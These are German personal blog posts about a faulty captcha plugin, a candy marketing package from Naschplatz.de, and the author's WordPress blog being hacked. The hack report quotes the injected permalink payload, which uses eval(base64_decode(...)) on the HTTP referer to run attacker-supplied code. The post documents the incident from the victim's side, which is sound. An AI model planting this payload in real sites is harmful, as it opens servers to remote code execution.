Hätte mir ja auch mal vorher jemand sagen können, dem Admin fällt sowas ja nicht auf 
Beim Eingeben des Captchas zum Kommentieren wurde auch bei richtiger Eingabe die Meldung “Invalid Code” ausgegeben und ein neuer Code wurde generiert. Endlos-Schleife.
Ich habe das Plugin vorerst deaktiviert in der Hoffnung, dass Akismet Spam-Kommentare solange zuverlässig abfängt.
Wir wurden also Teil einer Marketing-Kampagne. Naaaaaaaaaa toll. Ich bin diesem Fall bestechlich und werde das tun, was vom Absender intendiert war: über das Produkt schreiben
Ich habe heute ein Päckchen bekommen, in dem eine handgeschriebene Karte sowie eine Cellophan-Tüte voller Süßigkeiten zu finden waren.
Ich habe nur kurz überlegt: Street Credibility, Blogger-Marketingnutten und so weiter. Nicht so wild. Das hier ist MEIN Blog. Ich schreibe über Produkte und Dienstleistungen die mir nicht gefallen, also schreibe ich auch über Dinge, die ich gut finde. Habe ich auch vorher schon gemacht. Ich würde quasi unglaubwürdig, wenn ich NICHT darüber schreiben würde. Daher einige kurze Anmerkungen zur fachlichen Seite der Aktion:
Wer sich jetzt aufregt, dass ich genau das tue, was von mir “erwartet” wird: wenn die Welt nur solche Aktionen kennen würde, dann wäre fast alles in Butter, auch im Internet. Just IMHO.
Also: die Tüte von Naschplatz.de ist bereits geöffnet, es sind leckere Sachen drin, meiner Meinung nach recht “frisch” (so frisch Gummikram eben sein kann), so ähnlich, wie wenn man sich im Kino oder im Karstadt Kaufhof eine Zusammenstellung mit diesen Schäufelchen macht.
Ich weiß nicht, inwieweit es erfolgreich sein wird, den POS bei so einem Produkt ins Internet zu verlagern, immerhin hat der Kram eine starke situative (Naschhungerfressattacke), haptische und olfaktorische Komponente, die Kommt via Webseite zwangsläufig nicht soooo gut rüber… Aber wird sich zeigen.
Ich fand’s witzig, gut gemacht, sorgfältig und mit viel Liebe zum Detail vorbereitet. Daher ein freundliches “Dankeschön” an Naschplatz und viel Erfolg weiterhin.
Jetzt beantwortet bitte MIR eine Frage, meinetwegen auch per Mail oder über mein Kontaktformular, aber am liebsten in den Kommentaren: nach welchen Kriterien habt ihr die Blogs ausgewählt, die ihr angeschrieben habt?
PS: Versucht es mal mit SEO, ihr solltet in Google schon auf Platz 1 kommen mit EURER Seite.
PPS:
Lieber Naschplatz, ihr habt meine Datenschutzerklärung nicht gelesen, die auf derselben Seite platziert ist, wie die Anbieterkennzeichnung, aus dem Ihr meine Adresse geholt habt. Dort heißt es:
Datenschutz
Gemäß § 28 BDSG widerspreche ich jeder kommerziellen Verwendung und Weitergabe meiner Daten oder von auf dieser Webseite veröffentlichten Daten Dritter.
Und jetzt? 
Das könnte auch anders ausgehen, sowas. Wenn ich nämlich ein Autonomie-Fanatiker wäre. Aber das habt ihr sicher alles einkalkuliert. Ich habe euch zudem den Gefallen getan, diesen Absatz ganz nach unten und nicht ganz nach oben zu setzen – wo er vorher war.
/klugscheiss-modus
Traurig aber wahr: es hat den Anschein, dass mein kleines Blog am Mittwoch um 2:16 Uhr morgens Opfer einer Attacke wurde. Es begann mit der Registrierung eines Benutzers namens “MikeWink”. Danach hatten alle Links im Blog ein Anhängsel in der Form
http://www.example.com/posttitle/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
Der Browser reagiert für jeden Klick auf jeden beliebigen Link mit “Internal Server Error 500″. Man konnte im Blog also nicht mehr navigieren (jeder Link war wie oben beschrieben manipuliert), sondern nur noch die Startseite aufrufen. Bemerkt habe ich den Zustand Donnerstag nachmittag und direkt behoben, indem ich “einfach” im Admin Panel die Permalink-Struktur wieder zurückgesetzt habe auf meinen Standard (dort war der o.g. Code einfach hinzugefügt worden, wie auch immer das geht.
Die Attacke nutzte wohl eine Schwäche in der WordPress-Version 2.7.1, die ich deswegen noch nicht geupdated hatte, weil von Problemen mit dem 2.8.x-Strang berichtet wurde. Lesenswerte Details finden sich beim Fiesen Admin.
MIttlerweile habe ich das Problem oberflächlich behoben, meint: neue Passwörter für Datenbank, FTP, Admin-Bereich. Allerdings scheint der Hack tiefer in die Datenbank zu reichen und hier -Asche auf mein Haupt- ist das letzte Backup von April diesen Jahres, weil still und unbemerkt das Backup-Plugin nach dem Update auf 2.7.1 aufgehört hat, wöchentlich Mail mit einem Backup im Anhang zu schicken. Und da diese Mails automatisch wegsortiert und als “gelesen” marktiert werden… (Update: Lucky Bastard! Sie wurden von da an nur auf einen Ordner auf dem Server gespeichert, statt sie zu verschicken )
Es ist doch zum ko**** mit diesen scheiß Hackern bzw. hier eher SkriptKiddies, warum können die nicht einfach irgendwo hingehen und sterben?
Interessant. Das hat in meinem Blog funktioniert, obwohl die Benutzerregistrierung schon vorher deaktiviert war…